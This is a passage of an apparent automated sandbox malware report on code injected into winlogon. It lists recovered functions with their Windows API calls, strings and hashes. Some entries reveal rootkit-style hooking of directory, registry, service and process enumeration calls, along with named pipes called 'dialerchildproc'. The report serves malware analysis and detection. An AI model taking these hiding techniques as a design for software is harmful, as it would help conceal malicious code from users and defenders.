RtlVirtualUnwind.NTDLL ref: 000001FC60387F14
IsDebuggerPresent.KERNEL32 ref: 000001FC60387F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000001FC60387F89
UnhandledExceptionFilter.KERNEL32 ref: 000001FC60387F94

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: fae43c0fcf8f798cae1cb1a08d7bf01287e163d8c4137d3fffc78c060b2e57b4
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: C9315E72349B8596EB608F60E8803EE7371F784755F44443ADA8D97B98EF38C548D750

Function 000001FC6038B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001FC6038B585
RtlLookupFunctionEntry.NTDLL ref: 000001FC6038B59D
RtlVirtualUnwind.NTDLL ref: 000001FC6038B5D8
IsDebuggerPresent.KERNEL32 ref: 000001FC6038B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000001FC6038B61B
UnhandledExceptionFilter.KERNEL32 ref: 000001FC6038B626

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 37004eaf9d83ce1d5b6e55e062c0ceb659f0af3545b4f16d56456cf9286ff168
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 0E316A36248F8586DB208F25E9803EE73B0F788765F500136EA9D97BA4EF38C6458B40

Function 000001FC6038FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001FC6038FF67
WriteFile.KERNEL32 ref: 000001FC6039021E
WriteFile.KERNEL32 ref: 000001FC60390270
GetLastError.KERNEL32 ref: 000001FC60390372
GetLastError.KERNEL32 ref: 000001FC603903D2

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: b7d51ca77c367ba2d3e627e9b1d8de8a58fbdf6cfabfec30aaa20e189e578116
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 19E12272748A858EE700CF64D2803ED7BB1F3857A9F144136DE4EA7B98EA34C416D780

Function 000001FC6038BE3C Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction ID: fd42033445387d5490d8902e656ab31c9b9447f565f82f1240be98093e623b47
Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction Fuzzy Hash: C251043275879588F7209B72AA002EE7BB5B380BE4F144674EE9CA7B85CB38C501D740

Function 000001FC5FFA14A0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2665367132.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc5ff90000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
Instruction ID: 500d4007c48e8d9947ab708cd60f0e9edf481389f6d5be3efa8e13dd782f7d10
Opcode Fuzzy Hash: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
Instruction Fuzzy Hash: 0FF0627171429A8AEBA88F2DA95276977E0F308380F808529D6D9C3F24D33CE061EF44

Function 000001FC603812C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001FC60381326
GetProcessHeap.KERNEL32 ref: 000001FC60381334
HeapAlloc.KERNEL32 ref: 000001FC60381345
RegEnumValueW.ADVAPI32 ref: 000001FC603813A1

Part of subcall function 000001FC60381554: StrCmpIW.SHLWAPI ref: 000001FC60381585

GetProcessHeap.KERNEL32 ref: 000001FC603813E9
HeapAlloc.KERNEL32 ref: 000001FC603813F7
GetProcessHeap.KERNEL32 ref: 000001FC6038141B
HeapFree.KERNEL32 ref: 000001FC60381429
lstrlenW.KERNEL32 ref: 000001FC60381432
GetProcessHeap.KERNEL32 ref: 000001FC60381440
HeapAlloc.KERNEL32 ref: 000001FC6038144E
StrCpyW.SHLWAPI ref: 000001FC60381470
GetProcessHeap.KERNEL32 ref: 000001FC60381485
HeapFree.KERNEL32 ref: 000001FC60381493

Strings

d, xrefs: 000001FC60381365

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 2d56a4ce81fb924c1939ae9e5214ad3a7889d43c768bb56adbd8baf7c8e11500
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 16519EB2288B4993EB10DF62E6443AAB3B5F7C8B95F048135DA5D93B24EF38C455D780

Function 000001FC60381EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001FC60381EBF

Part of subcall function 000001FC60382174: GetModuleHandleA.KERNEL32 ref: 000001FC6038218C
Part of subcall function 000001FC60382174: GetProcAddress.KERNEL32 ref: 000001FC6038219D

Part of subcall function 000001FC60385C10: GetCurrentThreadId.KERNEL32 ref: 000001FC60385C4B

Strings

NtDeviceIoControlFile, xrefs: 000001FC60381FF6
NtQueryDirectoryFile, xrefs: 000001FC60381F1F
NtResumeThread, xrefs: 000001FC60381F02
ntdll.dll, xrefs: 000001FC60381ECD
NtEnumerateValueKey, xrefs: 000001FC60381F76
NtEnumerateKey, xrefs: 000001FC60381F59
EnumServicesStatusExW, xrefs: 000001FC60381FB1, 000001FC60381FD2
sechost.dll, xrefs: 000001FC60381FD9
EnumServiceGroupW, xrefs: 000001FC60381F90
advapi32.dll, xrefs: 000001FC60381F97, 000001FC60381FB8
NtQuerySystemInformation, xrefs: 000001FC60381EE5
NtQueryDirectoryFileEx, xrefs: 000001FC60381F3C

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: f4aec625f0b071da82cd9f7a3e695192cc2d87f89f370a6eaeda773840620956
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: C331A070589E4FA5EA04EBA4EB556F42330B7C4366F904573D80DB2365BE38CA49E7C0

Function 000001FC603823F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001FC60382405
GetCurrentProcessId.KERNEL32 ref: 000001FC6038240F

Part of subcall function 000001FC603819AC: OpenProcess.KERNEL32 ref: 000001FC603819CA
Part of subcall function 000001FC603819AC: IsWow64Process.KERNEL32 ref: 000001FC603819E0
Part of subcall function 000001FC603819AC: CloseHandle.KERNEL32 ref: 000001FC603819FB

CreateFileW.KERNEL32 ref: 000001FC60382468
WriteFile.KERNEL32 ref: 000001FC60382490
ReadFile.KERNEL32 ref: 000001FC603824AF
CloseHandle.KERNEL32 ref: 000001FC603824B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 000001FC60382438
\\.\pipe\dialerchildproc32, xrefs: 000001FC6038243F

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 0bee5b2aaef24b696c46181841992795fb13972ea2e95d6165dd8e80ef57d636
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: F0216076658B4583E7109B25E6043A963B0F3C8BB5F500235EA5D53BA8DF3CC549CB40

Function 000001FC6038104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001FC603810AB
RegEnumValueW.ADVAPI32 ref: 000001FC6038110E
GetProcessHeap.KERNEL32 ref: 000001FC60381155
HeapAlloc.KERNEL32 ref: 000001FC60381163
GetProcessHeap.KERNEL32 ref: 000001FC60381187
HeapFree.KERNEL32 ref: 000001FC60381195

Strings

d, xrefs: 000001FC603810CE

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: ab9e5da7fca3ebdae9904d266b363597cd15cffd0726d463f483dbaa2a27d967
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 6241AC73208B8596E7608F62E5443EAB7B4F388B99F008135DB9D97B54DF38C164CB40

Function 000001FC603B69F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001FC603B6A18
__scrt_acquire_startup_lock.LIBCMT ref: 000001FC603B6A6A
_RTC_Initialize.LIBCMT ref: 000001FC603B6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001FC603B6ABE
__scrt_release_startup_lock.LIBCMT ref: 000001FC603B6AE9

Memory Dump Source

Source File: 0000001B.00000002.2669173215.000001FC603B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC603B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc603b0000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: ffa0f879020b0362e780d65bef5ed91714bc4cf09ff013992f2d40dc927d9627
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: B381CF316C824F86FA50AB269B413F927B0E7E57AAF0444359A4DF7797DB3CC845A380

Function 000001FC5FF969F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001FC5FF96A18
__scrt_acquire_startup_lock.LIBCMT ref: 000001FC5FF96A6A
_RTC_Initialize.LIBCMT ref: 000001FC5FF96A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001FC5FF96ABE
__scrt_release_startup_lock.LIBCMT ref: 000001FC5FF96AE9

Memory Dump Source

Source File: 0000001B.00000002.2665367132.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc5ff90000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 45059b1074ce4b80f1f987b93ef83a4eacf102d7f8e81b9e553e70388c095dcc
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 8A81B13170024F86FA6CAB2A97413F962D0E745784F044735AA6543FB6EA39E987E7C0

Function 000001FC603875F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001FC60387618
__scrt_acquire_startup_lock.LIBCMT ref: 000001FC6038766A
_RTC_Initialize.LIBCMT ref: 000001FC60387698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001FC603876BE
__scrt_release_startup_lock.LIBCMT ref: 000001FC603876E9

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: e10a5173f84d3466d82fd50e9eb17a5853808870f1b968b43a38a2d3e951ec54
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 9181D73178C64F86FA509B2996413F962B2BBC57B2F1440B5990DF7796EB38C841E7C0

Function 000001FC60389804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000001FC60389889
GetLastError.KERNEL32 ref: 000001FC60389897
LoadLibraryExW.KERNEL32 ref: 000001FC603898C1
FreeLibrary.KERNEL32 ref: 000001FC60389907
GetProcAddress.KERNEL32 ref: 000001FC60389913

Strings

api-ms-, xrefs: 000001FC603898A9

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: fc5c0095adb0d534196c040eb6f9d8cd7b6bc52e2927eb7284a96d76e78ac4e5
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: D631C63124AA5A91FE519F12A6007F963B4F789BB2F1D053ADD2DA7790EF38C445A380

Function 000001FC60391B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001FC60391BCD
GetLastError.KERNEL32 ref: 000001FC60391BD9
CloseHandle.KERNEL32 ref: 000001FC60391BF1
CreateFileW.KERNEL32 ref: 000001FC60391C1C
WriteConsoleW.KERNEL32 ref: 000001FC60391C3B

Strings

CONOUT$, xrefs: 000001FC60391BFD

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 7eb75c1527b400d2b091f0d8b7a6d616beb0178947183b5e75ba0d6e1da61911
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 8C118E32358F4586E7509B46EA4436962B4F3C8BF6F000235EA5ED77A8EB38C9149780

Function 000001FC603830B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001FC603830D7
HeapAlloc.KERNEL32 ref: 000001FC603830EA
StrCmpNIW.SHLWAPI ref: 000001FC6038316B
GetProcessHeap.KERNEL32 ref: 000001FC603831D1
HeapFree.KERNEL32 ref: 000001FC603831DF

Strings

dialer, xrefs: 000001FC60383164

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 5ee0f42ec77659d354e4d25394072cb8911c204f317570dcce27e3fa6447c0f5
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: D331C831749B5A82EB11EF169A043F963B0FB84BA5F0440309E4C97B54FF38C461D780

Function 000001FC60381A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001FC60381A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000001FC60381A58
PathFindFileNameW.SHLWAPI ref: 000001FC60381A67
lstrlenW.KERNEL32 ref: 000001FC60381A73
StrCpyW.SHLWAPI ref: 000001FC60381A86
CloseHandle.KERNEL32 ref: 000001FC60381A94

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: ce8774e3b90a1dcd6a8a7e4e2d28d626a2a1c7c4e36e92310d227f0de5752655
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 6901AD71348A4682EB14DB12E5583A963B0F788FE2F484035CE9D93764EE3CC9858380

Function 000001FC603837AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001FC603837C8
GetCurrentProcess.KERNEL32 ref: 000001FC603837D6
VirtualProtectEx.KERNEL32 ref: 000001FC603837F8
GetCurrentProcess.KERNEL32 ref: 000001FC60383819
VirtualProtectEx.KERNEL32 ref: 000001FC6038383A
TerminateThread.KERNEL32 ref: 000001FC60383849

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 835c0dc0fb8c9648da2ff3b71d61db7e7bb7428dad6926e8a41e81e0c7277e3c
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 25112DB5659B4A82FB249B21E5097A667B0BB88BA2F040434DD4DA7764FF3CC508D780

Function 000001FC603890D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001FC60389103
_IsNonwritableInCurrentImage.LIBCMT ref: 000001FC60389198
RtlUnwindEx.NTDLL ref: 000001FC603891E7

Strings

csm, xrefs: 000001FC6038917E
f, xrefs: 000001FC60389116

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: b198b9a1fa35ffa33b6924619685c038232d469a29ef53288088eef33977e028
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: E551F43225960A9BEB14CF11E948BA933B5F3C4BA5F588572DE0EA3748EB35CC40D780

Function 000001FC60381AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001FC60381AD8
StrCmpNIW.SHLWAPI ref: 000001FC60381AF2
lstrlenW.KERNEL32 ref: 000001FC60381B01
StrCpyW.SHLWAPI ref: 000001FC60381B16

Strings

\\?\, xrefs: 000001FC60381AE6

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: d92471508c4b1aea383d6b8744d03e31b3666328c735919c4e5ca19c4b44f232
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: F9F04472348A4A92E7209B25F6D43E96770F784BA9F848031CA8D96754EF2CC648D780

Function 000001FC60383200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000001FC60383222
StrCpyW.SHLWAPI ref: 000001FC60383232
StrCatW.SHLWAPI ref: 000001FC6038323E
PathCombineW.SHLWAPI ref: 000001FC6038324C

Strings

\\.\pipe\, xrefs: 000001FC60383218

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: cc27b69d6a46ea1ae46a6358ceb44d1ec89cffc98c353b545b92562b6da9c2c3
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 3CF08974348F4691EA104B13FB441B55230BBC8FE1F044531DD9EA7B18DE2CC5419340

Function 000001FC6038A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001FC6038A154
GetProcAddress.KERNEL32 ref: 000001FC6038A16A
FreeLibrary.KERNEL32 ref: 000001FC6038A187

Strings

mscoree.dll, xrefs: 000001FC6038A14B
CorExitProcess, xrefs: 000001FC6038A163

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 361f16088635f3168090fe5f20656828c94f2b0cefebefdbdf58d81e0c7407fa
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: A7F05471359E4A92FB444B50E9843B41370ABC47A2F441035951FD57A4EE28C888D740

Function 000001FC60390860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001FC603908A2
GetConsoleMode.KERNEL32 ref: 000001FC60390960
GetLastError.KERNEL32 ref: 000001FC603909EA

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 643865c739bc51d348263ec1f5358697dbc3dbb42b94d187054ce38c2173076a
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 1181BE32698B4A8DFB509B658A403FD26B1B7C4BA6F440135DA4EF77A2EB34C441E390

Function 000001FC603857F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001FC60385806

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
Instruction ID: 3ec3bb1bdb4a137fd741dac8df1af32d8b3a28f55ad2f0fd8a53095980966742
Opcode Fuzzy Hash: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
Instruction Fuzzy Hash: 0361FD3265DB49C6E7608B15E5803AAB7B5F3C8765F500176EA8E93BA4DB7CC440DF80

Function 000001FC603C12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001FC603C12E0
_set_statfp.LIBCMT ref: 000001FC603C12FB
_set_statfp.LIBCMT ref: 000001FC603C1317
_set_statfp.LIBCMT ref: 000001FC603C1353

Memory Dump Source

